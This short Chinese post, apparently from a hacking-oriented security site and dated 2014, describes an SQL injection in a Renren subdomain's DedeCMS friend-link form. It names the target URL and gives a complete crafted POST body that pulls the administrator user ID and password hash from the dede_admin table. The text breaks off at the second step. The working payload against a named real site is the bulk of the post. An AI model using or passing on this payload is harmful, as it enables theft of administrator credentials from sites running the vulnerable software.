人人网某分站SQL注入漏洞下载

来源:黑吧安全网 浏览:637次 时间:2014-06-12
做网站找雨过天晴工作室

人人网某分站SQL注入漏洞

1.http://www.mhxx.renren.com/plus/flink_add.php
申请一个友情连接,填入验证码抓包,
将Post数据替换为:
Submit=%20%E6%8F%90%20%E4%BA%A4%20&dopost=save&email=&logo=,if(@`'`,0x7c,(select concat(userid,0x7c,pwd) from dede_admin limit 0,1)),1,1,1,1,1)#,@`'`&typeid=1&url=http%3A%2F%2F&validate=HEMS&_FILES[webname][name]=1.gif&_FILES[webname][type]=image/gifx&_FILES[webname][size]=10&&_FILES[webname][tmp_name]=pass\
2.返回页面审查元素: